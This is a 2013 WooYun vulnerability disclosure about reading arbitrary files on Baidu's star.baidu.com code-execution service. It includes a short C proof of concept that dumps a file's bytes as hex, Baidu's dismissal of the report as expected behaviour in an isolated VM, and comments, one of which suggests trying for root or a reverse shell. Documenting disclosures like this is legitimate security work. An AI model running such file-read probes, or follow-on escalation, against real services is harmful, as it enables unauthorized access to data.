当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-022624

漏洞标题:star.baidu.com读取文件

相关厂商:百度

漏洞作者: 囧思九千

提交时间:2013-04-27 16:25

修复时间:2013-04-27 16:38

公开时间:2013-04-27 16:38

漏洞类型:任意文件遍历/下载

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-04-27: 细节已通知厂商并且等待厂商处理中
2013-04-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

fopen读权限限制不严。

详细说明:

QQ截图20130427120332.png

漏洞证明:

#include <stdlib.h>
#include <dirent.h>
#include <sys/stat.h>
#include <string.h>
int main()
{
int fsize = 0;
FILE *fp = fopen("文件路径", "r");
if (fp)
{
fseek(fp, 0, SEEK_END);
fsize = ftell(fp);
//printf("文件%s可读 长度:%d\n", fp ? "" : "不", fsize);
char *buf = (char*)malloc(fsize);
fseek(fp, 0, 0);
fread(buf, 1, fsize, fp);
for (int i = 0;i < fsize;i++)
{
if (i % 0x10 == 0)
{
//printf("\n");
}
printf("\\x%02X", buf[i] & 0xFF);
}
}
return 0;
}


修复方案:

版权声明:转载请注明来源 囧思九千@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-04-27 16:38

厂商回复:

这个是业务正常需求,虚拟机已做隔离。

最新状态:

暂无


漏洞评价:

评论

  1. 2013-04-27 16:38 | lanz ( 路人 | Rank:26 漏洞数:5 | whatever)

    正常功能,就是个虚拟机而已,什么文件随便看。有兴趣的可以试试获取root权限或反弹shell

  2. 2013-04-27 16:57 | hqdvista ( 普通白帽子 | Rank:154 漏洞数:31 | N/A)

    @lanz 这位是SSL的?

  3. 2013-04-27 18:03 | lanz ( 路人 | Rank:26 漏洞数:5 | whatever)

    SSL是什么? 我明明是打酱油的

  4. 2013-04-27 18:24 | hqdvista ( 普通白帽子 | Rank:154 漏洞数:31 | N/A)

    @lanz 好吧,当我啥都没说

  5. 2013-04-28 10:17 | 盛大网络(乌云厂商)

    char *buf = (char*)malloc(fsize+1);